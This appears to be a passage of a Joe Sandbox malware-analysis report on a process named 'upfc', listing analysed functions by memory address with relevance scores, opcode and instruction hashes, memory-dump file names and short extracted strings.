                                • Opcode ID: d16359f228bdb3969814395be0c53b7d71179ac7f0f83864d6bd59b1a879caeb
                                • Instruction ID: 53bf48a4f359340d78f95853557eeab990c54e9a212afc8502ef1c7bfb0e8cad
                                • Opcode Fuzzy Hash: d16359f228bdb3969814395be0c53b7d71179ac7f0f83864d6bd59b1a879caeb
                                • Instruction Fuzzy Hash: C4415D71E09A1D8FDB54EB98D8A4AECBBF1FF58301F4105AAD019E72A1DB34A945CB40
                                Function 00007FFD9B885FDD Relevance: .1, Instructions: 105COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b885000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4b75472d4123a5b4f219406e72c24893f29335d708b5de1d6bf8055691a1668c
                                • Instruction ID: a204d0aaf2a2c23a8a4e3ac2c9cd1149fc186e2f5ca729f59c34781e06fe16fe
                                • Opcode Fuzzy Hash: 4b75472d4123a5b4f219406e72c24893f29335d708b5de1d6bf8055691a1668c
                                • Instruction Fuzzy Hash: 1B416B70E14A4D8FDB84EBE8D865AEDBBB1FF48310F01017AE018E3296DA346941CB91
                                Function 00007FFD9B8864E9 Relevance: .1, Instructions: 105COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b885000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b067d67ccd6209622ddc1919439d2991d008abf8c2da5911cefd04ea3903e60c
                                • Instruction ID: 44c1094fffcf5f15d91a103e97198c680e4614faa2bce6f54bb05a93befacff5
                                • Opcode Fuzzy Hash: b067d67ccd6209622ddc1919439d2991d008abf8c2da5911cefd04ea3903e60c
                                • Instruction Fuzzy Hash: 4F418070D0965D8FEB55DFA4C864AEDB7B1FF49300F1101BAD019D729ACB399981CB41
                                Function 00007FFD9B8883F5 Relevance: .1, Instructions: 103COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b885000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 91db70d23fc450e3a47a1947954966a9495405788ce3e84d748f27718fb9bec3
                                • Instruction ID: 5fe3c7129db08f1c759bdcece56beb96e51ce051532f3f34c55a72b7d8434529
                                • Opcode Fuzzy Hash: 91db70d23fc450e3a47a1947954966a9495405788ce3e84d748f27718fb9bec3
                                • Instruction Fuzzy Hash: DC314832E0961E8FDB68DFA4D4646FEB7B1EF58300F11017AE019E32D1CA396A41CB91
                                Function 00007FFD9B882BC9 Relevance: .1, Instructions: 91COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b880000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fc185f058d767cbb7c1ee79f7c8e1c4cd1c93d7f105ed7790855777bab793855
                                • Instruction ID: 505111a99b68d92cd3c248e9f266e661c3c682d7a4c37cfa385b5f6dd85bedd8
                                • Opcode Fuzzy Hash: fc185f058d767cbb7c1ee79f7c8e1c4cd1c93d7f105ed7790855777bab793855
                                • Instruction Fuzzy Hash: 1B312A70D0A64D8FDB55DFA8D8646EDB7B1FF59300F10047AE019E3291DB389940CB81
                                Function 00007FFD9B88186A Relevance: .1, Instructions: 64COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b880000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: de39de14fee2e75c82637a27dbb38b2e033e3f5d5bb42a5a9f8f4517d4c5b471
                                • Instruction ID: 4e7380405c5fa0d7a0b30fd0c10e7661c7191ef7aeee2f6f53402d1a05b7253a
                                • Opcode Fuzzy Hash: de39de14fee2e75c82637a27dbb38b2e033e3f5d5bb42a5a9f8f4517d4c5b471
                                • Instruction Fuzzy Hash: A7110D31E5A92D8FD768EBA0D4617FCB271FF0A701F4114B9D05EA6192CE396A44CB40
                                Function 00007FFD9B880C05 Relevance: .1, Instructions: 57COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b880000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 222091d1120c8d62e108a3a8dffb55b1310ac6a74ce8f86f5ac3c00494b3defa
                                • Instruction ID: 58c9e0821d2093b086eb9c4bec6188d0cd1290774a073216d2ec19ca0c3af4d7
                                • Opcode Fuzzy Hash: 222091d1120c8d62e108a3a8dffb55b1310ac6a74ce8f86f5ac3c00494b3defa
                                • Instruction Fuzzy Hash: 7C119131F1591E8BDB68EB94D8657EDB362FF45300F81027AD029AB1A5DE347A458B80
                                Function 00007FFD9B8808B1 Relevance: .0, Instructions: 42COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b880000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 931567016a469b63757011ce7a5d2022d99321a3509613ae9138ffe701228a4f
                                • Instruction ID: c399640902d6f64b70c31bb751c5d889b3d10672d191a37726cc1da0b7b0fbd9
                                • Opcode Fuzzy Hash: 931567016a469b63757011ce7a5d2022d99321a3509613ae9138ffe701228a4f
                                • Instruction Fuzzy Hash: E1F02231A09A4D9FD794EB6888A95EC7FB0FF89300F8101FAD018C31A6DF382A95C741
                                Function 00007FFD9B881F5D Relevance: .0, Instructions: 39COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b880000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ccf53f3e698806166ad59005aa15451cdcb4ae5bd1117c288df1d4b20541a080
                                • Instruction ID: 19bf1ec8b6fb3dbeef40b56c62a4054f801c621c7b170205e7635b2d22776f9c
                                • Opcode Fuzzy Hash: ccf53f3e698806166ad59005aa15451cdcb4ae5bd1117c288df1d4b20541a080
                                • Instruction Fuzzy Hash: 89F02831D0EA4D4FD714EB6888655EC7FA0EF48200F4501F5D429C60E2EF386D46C301
                                Function 00007FFD9B881241 Relevance: .0, Instructions: 37COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b880000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6cf023c0c0500aafec59294204d6e0598ff1e6f4cab11a043e4aef4893e4baaa
                                • Instruction ID: bcf24a5dc90924ff5e98082d103c336fa76c56cd22bf18f8858ea18e1c065664
                                • Opcode Fuzzy Hash: 6cf023c0c0500aafec59294204d6e0598ff1e6f4cab11a043e4aef4893e4baaa
                                • Instruction Fuzzy Hash: CEF0BE3050E64D8FCB66EF14C8556E93BA0FF5A300F0601AAE41CC71A2CB7ADA64CB81
                                Function 00007FFD9B888399 Relevance: .0, Instructions: 35COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b885000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2d04b37a7352b28d701c463d5b1755cb2f1aeea1468404ea1e7c46b95697a55b
                                • Instruction ID: 437673ff52f25dc9e5d84addf058de7c718753d71cebfc0fa07981ef6f5f75df
                                • Opcode Fuzzy Hash: 2d04b37a7352b28d701c463d5b1755cb2f1aeea1468404ea1e7c46b95697a55b
                                • Instruction Fuzzy Hash: 8CF03C3091DA8D8FDB51EB6888686ED7FF0FF19304F4504A7D458D60A2D7389544CB41
                                Function 00007FFD9B880528 Relevance: .0, Instructions: 31COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b880000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4b906e38aa76fef87d61cd7d8d8787a966b601081a24293271e4852abc45e926
                                • Instruction ID: e6f277bfdbd44c6b49878375b8cf172483cecaccf1affced6d632e91666cb1a1
                                • Opcode Fuzzy Hash: 4b906e38aa76fef87d61cd7d8d8787a966b601081a24293271e4852abc45e926
                                • Instruction Fuzzy Hash: D6F05E30509A0E8FDB65EF5494116E577A0FF59304F000176E42CD6196CA35A660C781
                                Function 00007FFD9B8881E0 Relevance: .0, Instructions: 29COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b885000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 684e947d3b0f97777c6dac990f4c2b4ffc138e757008c94602e787385176f5a0
                                • Instruction ID: 61377d79ac162976e87490f508ceecd4766b034370dbb9cee9c3091ebeb45a03
                                • Opcode Fuzzy Hash: 684e947d3b0f97777c6dac990f4c2b4ffc138e757008c94602e787385176f5a0
                                • Instruction Fuzzy Hash: 1CE0D875989D4CCBCB649B599C5029477B1FB4D304F01026DE45CC7191D7355E56C301
                                Function 00007FFD9B88685C Relevance: .0, Instructions: 29COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B885000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B885000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b885000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d31636a8ad0cc4e7ae7561114b7b8ef60b1c97d70ef0d9cddb78f85d3628a5a7
                                • Instruction ID: fdcc27c5cec694ea759e9b6e237a40e219626e3a4e5591844828d89103f0611b
                                • Opcode Fuzzy Hash: d31636a8ad0cc4e7ae7561114b7b8ef60b1c97d70ef0d9cddb78f85d3628a5a7
                                • Instruction Fuzzy Hash: 23E06F32A0AE0C8BCB60AF98ACA028833A0FB8C308F01026AE45CC7180D3316A84C302
                                Function 00007FFD9B881F15 Relevance: .0, Instructions: 29COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b880000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e1466cc37be4747d1c03cf260fd570b266d3f876cb9d60936201b393657f7046
                                • Instruction ID: c3b67f0477bc8078d90c3d9f6a03a0dbe0e803dc6fb174bfdf36870062390c4a
                                • Opcode Fuzzy Hash: e1466cc37be4747d1c03cf260fd570b266d3f876cb9d60936201b393657f7046
                                • Instruction Fuzzy Hash: F0E09231C4FA8E4FD7216F6489661E97B60FF0A700F0616BAD06886092DB7C9628C741
                                Function 00007FFD9B881C19 Relevance: .0, Instructions: 28COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b880000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7aafd240f82503a18d954fe83f1fda596be78c069d652a47f022fbc4134a1402
                                • Instruction ID: efa91c2ae656b92b4a86e1885715b473e92c9d06697392523168f69425bc3470
                                • Opcode Fuzzy Hash: 7aafd240f82503a18d954fe83f1fda596be78c069d652a47f022fbc4134a1402
                                • Instruction Fuzzy Hash: 3FE0A03184F78D4FD7626B6448611D57B70FF0A700F0A15A6D068C60A2DA6896588302
                                Function 00007FFD9B882536 Relevance: .0, Instructions: 27COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b880000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 59d503f4a01e94016d3a10f0d00671b5c8829c795b1f8038d9be554b43a3a3c4
                                • Instruction ID: ae2388c24174c1af2598202f221d7952a23a7228175f5152aebbfb41b755a1e7
                                • Opcode Fuzzy Hash: 59d503f4a01e94016d3a10f0d00671b5c8829c795b1f8038d9be554b43a3a3c4
                                • Instruction Fuzzy Hash: 50F09E71A5495E4FDFA4EF58C894BA9B3B1FB58340F1086E6901DE3255DA30AEC58F80
                                Function 00007FFD9B880530 Relevance: .0, Instructions: 21COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b880000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4052877536065a422ffdacf6b0f575e94888fbc971f21f8d59286a0c27209402
                                • Instruction ID: c7f4516cd99f28ee773ec3fcc90fa90195b457c14083bdfba21257d30318141a
                                • Opcode Fuzzy Hash: 4052877536065a422ffdacf6b0f575e94888fbc971f21f8d59286a0c27209402
                                • Instruction Fuzzy Hash: D0E04F30509A0ECFDBA4EF58C4506A677A1FF5C304F100539E42CD6190CB35E6A0CB80
                                Function 00007FFD9B880C65 Relevance: .0, Instructions: 19COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b880000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e67d66c268693f67aeb18f4924518817eb4d892f8e90b87f589e7369a8b13f1a
                                • Instruction ID: 7a150a5b6507382244494256046957d30d0be3c1350848b34f0941929a2da255
                                • Opcode Fuzzy Hash: e67d66c268693f67aeb18f4924518817eb4d892f8e90b87f589e7369a8b13f1a
                                • Instruction Fuzzy Hash: 88D0E231F0592D8ECB64EA88E8107EDB771EF89311F8002B6C11DE3199CA306E428B81

                                Non-executed Functions

                                Function 00007FFD9B8806FA Relevance: 7.7, Strings: 6, Instructions: 190COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b880000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID: =O_^$?O_I$O_^U$O_^X$O_^f$O_^g
                                • API String ID: 0-1252858796
                                • Opcode ID: cc4013b17c218e5638511d7a2ddf1fa21ce7fa50690b2637e2f66d4c4ffed66a
                                • Instruction ID: e68626b80c5bcb7ef160820daebc656f64b3a71310be03e057027d77c6bd2453
                                • Opcode Fuzzy Hash: cc4013b17c218e5638511d7a2ddf1fa21ce7fa50690b2637e2f66d4c4ffed66a
                                • Instruction Fuzzy Hash: 03518C63B1FAC54FEB21279C3C651A83B90FF85B2171505F7E0A88A1A7F825A9468281
                                Function 00007FFD9B8806A5 Relevance: 6.5, Strings: 5, Instructions: 205COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000028.00000002.1776015307.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_40_2_7ffd9b880000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID: ?O_I$O_^J$O_^K$O_^f$O_^g
                                • API String ID: 0-2965963803
                                • Opcode ID: a636d4ae03a1bef8462d6fd5dba39396a052232ce889302a4dcd37b7228c3306
                                • Instruction ID: 0bb0647acc2acea5912c8425b719c10f2b8562da3ca9080f8019508e275735f9
                                • Opcode Fuzzy Hash: a636d4ae03a1bef8462d6fd5dba39396a052232ce889302a4dcd37b7228c3306
                                • Instruction Fuzzy Hash: 98517B63B1FAC54FEB3537AC7C641A82790FFC5B2171505F7E0A8CA0E7E865A9468281

                                Executed Functions

                                Function 00007FFD9B895141 Relevance: 9.4, Strings: 7, Instructions: 624COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000029.00000002.1775880056.00007FFD9B895000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B895000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ffd9b895000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID: "$"$-$[$]${$}
                                • API String ID: 0-2220975799
                                • Opcode ID: bdfbf556050404af1e4054273f7303867c75d94e2291a8910347ea605916922f
                                • Instruction ID: 6ea4ae953b25313c4ad17365f8592372c5206abf798152f1a580d767d7beec6a
                                • Opcode Fuzzy Hash: bdfbf556050404af1e4054273f7303867c75d94e2291a8910347ea605916922f
                                • Instruction Fuzzy Hash: 2442F770E1962D8FDBA8DF68C8A0BEDB7B1FF59301F5041A9D04DA7295CA346A81CF40
                                Function 00007FFD9B8906FA Relevance: 7.7, Strings: 6, Instructions: 232COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000029.00000002.1775880056.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ffd9b890000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID: =N_^$?N_I$N_^U$N_^X$N_^f$N_^g
                                • API String ID: 0-893460077
                                • Opcode ID: 20e64b9e02fa057567fecc42236b64764b659184514e475f50d4e546895a45f1
                                • Instruction ID: 4f686dc6c5ddb10426d5ebb00424e3448a1aa791761cd10ebb779b6eefe477c8
                                • Opcode Fuzzy Hash: 20e64b9e02fa057567fecc42236b64764b659184514e475f50d4e546895a45f1
                                • Instruction Fuzzy Hash: EF61BE63B0F6895FEB2297DC6CA41E87FA1FF45760B4501F7E098C70A7EC15AA068381
                                Function 00007FFD9B8906E0 Relevance: 6.5, Strings: 5, Instructions: 251COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000029.00000002.1775880056.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ffd9b890000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID: =N_^$?N_I$N_^X$N_^f$N_^g
                                • API String ID: 0-3255808656
                                • Opcode ID: e5d3297c137997cb4fa239cd841142ee1358a7c981609020bbbfa1ac5702daa4
                                • Instruction ID: 852282fff0ca1afc31ae57fecf7274848b1c9f509d3a2d803f801803b191b9b5
                                • Opcode Fuzzy Hash: e5d3297c137997cb4fa239cd841142ee1358a7c981609020bbbfa1ac5702daa4
                                • Instruction Fuzzy Hash: 3361BC63B0F6895BEB2697DC6CA50E87FA0FF49760B4502F7E058C70E7EC156A068381
                                Function 00007FFD9B8906A5 Relevance: 6.5, Strings: 5, Instructions: 247COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000029.00000002.1775880056.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ffd9b890000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID: ?N_I$N_^J$N_^K$N_^f$N_^g
                                • API String ID: 0-3465608391
                                • Opcode ID: 5aac7501c62e9f7051f76aea91315eb6b6d529c3852120bb78a4e075c18896c5
                                • Instruction ID: 3671b5f1aa899d9411c431b52a8ad4ff644f9bf5dc4428debba94520f8aded44
                                • Opcode Fuzzy Hash: 5aac7501c62e9f7051f76aea91315eb6b6d529c3852120bb78a4e075c18896c5
                                • Instruction Fuzzy Hash: 8A61CB63B0F6895BEB2197EC6CA40E87FA1FF45760B1505FBD198C70E7E815A90683C1
                                Function 00007FFD9B8904F8 Relevance: 1.3, Strings: 1, Instructions: 53COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000029.00000002.1775880056.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ffd9b890000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID: ?N_^
                                • API String ID: 0-1123592777
                                • Opcode ID: 51e81d4849876f32a41880f804a9495f014ca7c8d52d46b4f1c0e7742f804346
                                • Instruction ID: f81a0918c252fd9d7bca808ca4fb4401466ed33aac772872a09b32639ecbfd15
                                • Opcode Fuzzy Hash: 51e81d4849876f32a41880f804a9495f014ca7c8d52d46b4f1c0e7742f804346
                                • Instruction Fuzzy Hash: 7401D231A0D25E9FDB56EFA898A15F67BA0EF05308F0401BAE05CC6093EA68A551C781
                                Function 00007FFD9B890F71 Relevance: .4, Instructions: 371COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.1775880056.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ffd9b890000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5c5231560197a157e1435a6f4a6408d763a61ff83ac638195a8b783ecde77de8
                                • Instruction ID: de80653e765045f43532d634ff927bfaa3ef6991ce3a351c72be6ccd64f29e74
                                • Opcode Fuzzy Hash: 5c5231560197a157e1435a6f4a6408d763a61ff83ac638195a8b783ecde77de8
                                • Instruction Fuzzy Hash: 70D13D71E1965D8FDBACDB58D8A4BA8BBB1FF58300F4441B9D00DE32E6DA356981CB01
                                Function 00007FFD9B897C89 Relevance: .3, Instructions: 334COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.1775880056.00007FFD9B895000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B895000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ffd9b895000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 00f719e8853cb47f06985494383f6be715ce6ffa0b872c2c7122d6e9e737b108
                                • Instruction ID: 3d4f4b6a1a100d4d07e88cbd6bb7f99dbd9e6592df01c93e2ca5793b6ba5b104
                                • Opcode Fuzzy Hash: 00f719e8853cb47f06985494383f6be715ce6ffa0b872c2c7122d6e9e737b108
                                • Instruction Fuzzy Hash: 0EC18F74A0A51E8FEB65DBA8C495BEC7BB1FF99340F51417AC00DD3296CB386A42CB40
                                Function 00007FFD9B893239 Relevance: .3, Instructions: 310COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.1775880056.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ffd9b890000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 60549bc7e1c0e8465cc30f24176113cb0d372db8b4b45ecc486bad1b167b4b0e
                                • Instruction ID: 57221d883088d0131891cd9f7684e57bb9badaa9d05b3781d3ebaaa1c11cce86
                                • Opcode Fuzzy Hash: 60549bc7e1c0e8465cc30f24176113cb0d372db8b4b45ecc486bad1b167b4b0e
                                • Instruction Fuzzy Hash: 60B14D71E1965D8FDBACDB58D8A4BA8B7A1FF58300F0441B9D00DE72E6DE346981CB01
                                Function 00007FFD9B890F8D Relevance: .3, Instructions: 307COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.1775880056.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ffd9b890000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4e91d95c68014b800ee9a058d43f767c1e1b3a6ee631cb2002c2f399afbb0e17
                                • Instruction ID: 71b47f21d2d6e814dcb15b6e479fbcd8977ebd6a04d602dad9beeda5fbd84dc9
                                • Opcode Fuzzy Hash: 4e91d95c68014b800ee9a058d43f767c1e1b3a6ee631cb2002c2f399afbb0e17
                                • Instruction Fuzzy Hash: FAB14D71E1965D8FDBACDB58D8A4BA8BBB1FF58300F4441B9D00DE72A6DE356980CB01
                                Function 00007FFD9B8905D8 Relevance: .3, Instructions: 281COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.1775880056.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ffd9b890000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f188c792663113a954f86c5e7c4a9f02340b10c6713e4300fe08f5c4e1d625f4
                                • Instruction ID: 869d75b574d930472c77c17d6a5dcef10c0d790432f922fe92d30e6248c682a3
                                • Opcode Fuzzy Hash: f188c792663113a954f86c5e7c4a9f02340b10c6713e4300fe08f5c4e1d625f4
                                • Instruction Fuzzy Hash: 1781E231B1DA494BDF68EF5C88615B97BE2FF9C300B15457EE45EC3292DE34A9028780
                                Function 00007FFD9B896163 Relevance: .2, Instructions: 200COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.1775880056.00007FFD9B895000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B895000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ffd9b895000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 121fc2ea033de75c176d834cd684a8ce673556e718ad8f908690404de3176073
                                • Instruction ID: 3d6a5fdeb10ca2d2b22e88accfd364a2a279a5f4d86ec52ada87ffb3db4912ae
                                • Opcode Fuzzy Hash: 121fc2ea033de75c176d834cd684a8ce673556e718ad8f908690404de3176073
                                • Instruction Fuzzy Hash: 3F719570E1461D8FDB94EFA8D895BECBBB1FF58300F5041AAD01DE3296DA3469818B41
                                Function 00007FFD9B89129D Relevance: .2, Instructions: 185COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000029.00000002.1775880056.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_41_2_7ffd9b890000_upfc.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 78e03ae86fbef1c7855c178941ab38b97909361eae1372f78e91c2d64cea5ccf
                                • Instruction ID: 1247d787e82a0bf828cb4767e26e360577e965222b75a99e2f71e521b4f43252
                                • Opcode Fuzzy Hash: 78e03ae86fbef1c7855c178941ab38b97909361eae1372f78e91c2d64cea5ccf
